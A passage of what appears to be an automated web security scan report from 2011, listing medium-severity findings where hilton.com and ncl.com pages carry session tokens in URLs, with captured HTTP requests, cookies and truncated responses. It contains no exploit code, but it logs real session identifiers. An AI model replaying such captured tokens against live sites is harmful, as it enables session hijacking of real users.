Cookie: BetaCookie=Y; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmcore.tst=0.798; mmid=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635909366:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 67255
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:15 GMT
Connection: close

<!-- <SETVALUE PARAM="content_head" VALUE="`fileURL("home_head.jhtml")`"> -->

<!-- <SETVALUE PARAM="content_footer" VALUE="`fileURL("home_footer.jhtml")`"> -->


<!DOCTYPE HTML PUBLIC "-//W3C//D
...[SNIP]...
<br>
                           
                   <a href="http://www.hilton.com/en/hi/help/sign_in_help.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow">Forgot password?</a>
...[SNIP]...
<li id="navmain01" title="Specials &amp; Packages"><a href="http://www.hilton.com/en/hi/promotions/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Specials & Packages</a>
...[SNIP]...
<li id="navmain03" title="Meetings"><a href="http://www.hilton.com/en/hi/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Business">Meetings</a>
...[SNIP]...
<li id="navmain0302" title="Social Gatherings"><a href="http://www.hilton.com/en/hi/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Social&it=Tnav,GM">Social Gatherings</a>
...[SNIP]...
<li id="navmain05" title="Travel Guides"><a href="http://www.hilton.com/en/hi/ctg/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Travel Guides</a>
...[SNIP]...
<li id="navmain07" title="My Favorite Hotels"><a href="http://www.hilton.com/en/hi/cart/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">My Favorite Hotels</a>
...[SNIP]...
9.17. http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.ncl.com
Path:   /nclweb/cbooking/pricingQualifierForm.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nclweb/cbooking/pricingQualifierForm.html;jsessionid=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336 HTTP/1.1
Host: www.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.4.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646122505-New%7C1320238122505%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 69014
Date: Mon, 03 Oct 2011 12:48:23 GMT
Connection: close


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<meta charset="utf-8">
<title>


NCL - Ge
...[SNIP]...
9.18. http://www.ncl.com/nclweb/cbooking/submitCruiseDetailsForm.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.ncl.com
Path:   /nclweb/cbooking/submitCruiseDetailsForm.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /nclweb/cbooking/submitCruiseDetailsForm.html?packageId=1912713&itineraryCode=15819 HTTP/1.1
Host: www.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.4.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646122505-New%7C1320238122505%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html;jsessionid=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 03 Oct 2011 12:48:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; path=/
Set-Cookie: NCLPERSIST1=868788416.20480.0000; path=/
Content-Length: 431

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html&#59;jsessionid=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336">http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html&#59;jsessionid=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336</a>
...[SNIP]...
9.19. http://www1.hilton.com/en_US/hh/home_index.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hh/home_index.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en_US/hh/home_index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?it=Tnav,HHonors HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://hhonors1.hilton.com/en_US/hh/home_index.do?it=Tnav,HHonors
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Mon, 03 Oct 2011 13:05:31 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:31 GMT;path=/

9.20. http://www1.hilton.com/en_US/hi/customersupport/index.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/index.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en_US/hi/customersupport/index.do;jsessionid=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64 HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; NSC_qse-qgt=44153d5f3660; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637037222:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:16:56 GMT
Content-Length: 35005
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:27:56 GMT;path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
9.21. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do;jsessionid=89A82514A002A1CE9413C2D5351C2762.etc33?opTitle=hotel_primary_nav_dining&cid=OH,HH,boslh,Dining_Menu_ConnollysF HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=6134AD4FCABA66CF1C1924679BB50856.etc33; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:10 GMT;path=/
Content-Length: 49172


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
9.22. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/index.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149& HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; NSC_qse-qgt=44153d5f3660; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 12:53:40 GMT
Content-Length: 84951
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:04:40 GMT;path=/


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
9.23. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/index.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149& HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; NSC_qse-qgt=44153d5f3660; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 12:53:40 GMT
Content-Length: 84951
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:04:40 GMT;path=/


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<li>


<a href="http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do;jsessionid=89A82514A002A1CE9413C2D5351C2762.etc33?opTitle=hotel_primary_nav_dining&cid=OH,HH,boslh,Dining_Menu_ConnollysF" title="" target="_blank" class="">Lift your spirits at Connolly's</a>
...[SNIP]...
9.24. http://www1.hilton.com/en_US/hi/index.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hi/index.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 59059
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close
Set-Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; Path=/
Set-Cookie: BetaCookie=Y; Domain=.hilton.com; Expires=Tue, 04-Oct-2011 12:52:41 GMT; Path=/en_US
Set-Cookie: BetaCookie=Y; Domain=.hilton.com; Expires=Tue, 04-Oct-2011 12:52:41 GMT; Path=/en
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:41 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
...[SNIP]...
<td>
           
               
                                                                                                                                       <a href="/en_US/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13" title="Hilton Hotels Home Page" tabindex="3">
                           <img src="/en_US/hi/media/images/logos/logo.gif" border="0" />
...[SNIP]...


           
                                                                                                                                                                           <a href="/doxch.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?dst=http://GW-HI/en_US/hi/search/findhotels/index.htm&it=Tnav,Res">
       Reservations
   </a>
...[SNIP]...

                       
                       
                                                                                                                                                                                       <a href="/en_US/hh/home_index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?it=Tnav,HHonors">
       Hilton HHonors
   </a>
...[SNIP]...
<li class="brandBarLi brandBarLi_CH" id="brandBarLi_CH"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_CH');" onmouseout="turnOffPopup('brandBarLi_CH');" href="/en/ch/home.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HI" id="brandBarLi_HI"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HI');" onmouseout="turnOffPopup('brandBarLi_HI');" href="/en_US/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_DT" id="brandBarLi_DT"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_DT');" onmouseout="turnOffPopup('brandBarLi_DT');" href="/en_US/dt/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_ES" id="brandBarLi_ES"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_ES');" onmouseout="turnOffPopup('brandBarLi_ES');" href="/en_US/es/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_GI" id="brandBarLi_GI"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_GI');" onmouseout="turnOffPopup('brandBarLi_GI');" href="/en_US/gi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HP" id="brandBarLi_HP"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HP');" onmouseout="turnOffPopup('brandBarLi_HP');" href="/en_US/hp/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HW" id="brandBarLi_HW"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HW');" onmouseout="turnOffPopup('brandBarLi_HW');" href="/en_US/hw/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HT" id="brandBarLi_HT"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HT');" onmouseout="turnOffPopup('brandBarLi_HT');" href="/en_US/ht/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_WW" id="brandBarLi_WW"><a class="brandBarLiA" href="/en_US/hh/home_index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="/en_US/hi/customersupport/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13">
                                                       Customer Support
                                                   </a>
...[SNIP]...
<li>
                           
                           
                                                       <a href="/en_US/ww/customersupport/privacy-policy.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13" rel="nofollow" class="linkPrivacyPolicy">
                               Privacy Policy (Updated Sep 2011)
                           </a>
...[SNIP]...
<li>
                           
                           
                                                       <a href="/en_US/hi/customersupport/site-usage.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13" rel="nofollow">
                               Site Usage Agreement
                           </a>
...[SNIP]...
<li><a href="/es/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13">Espa..ol</a>
...[SNIP]...
<li><a href="/fr/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13">Fran..ais</a>
...[SNIP]...
9.25. http://www1.hilton.com/en_US/hi/sitemap/index.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/sitemap/index.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en_US/hi/sitemap/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:04:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=1907DCB21C07B2421366C003D9FC39EA.etc62; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:15:10 GMT;path=/
Content-Length: 37911


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="m
...[SNIP]...
9.26. http://www3.hilton.com/en_US/ch/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/ch/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/ch/doxch.htm?dst=http://PFS-CH/en/ch/home.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://conradhotels1.hilton.com/en/ch/home.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801158,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:07 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 587

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://conradhotels1.hilton.com/en/ch/home.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801158,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://conradhotels1.hilton.com/en/ch/home.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801158,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a>
...[SNIP]...
9.27. http://www3.hilton.com/en_US/dt/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/dt/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/dt/doxch.htm?dst=http://PFS-DT/en_US/dt/hotel/BOSCODT/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://doubletree1.hilton.com/en_US/dt/hotel/BOSCODT/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800734,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:51 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 619

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://doubletree1.hilton.com/en_US/dt/hotel/BOSCODT/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800734,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://doubletree1.hilton.com/en_US/dt/hotel/BOSCODT/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800734,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646
...[SNIP]...
9.28. http://www3.hilton.com/en_US/es/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/es/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/es/doxch.htm?dst=http://PFS-ES/en_US/es/hotel/BOSAPES/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://embassysuites1.hilton.com/en_US/es/hotel/BOSAPES/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800460,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:41 GMT
Content-Type: text/html
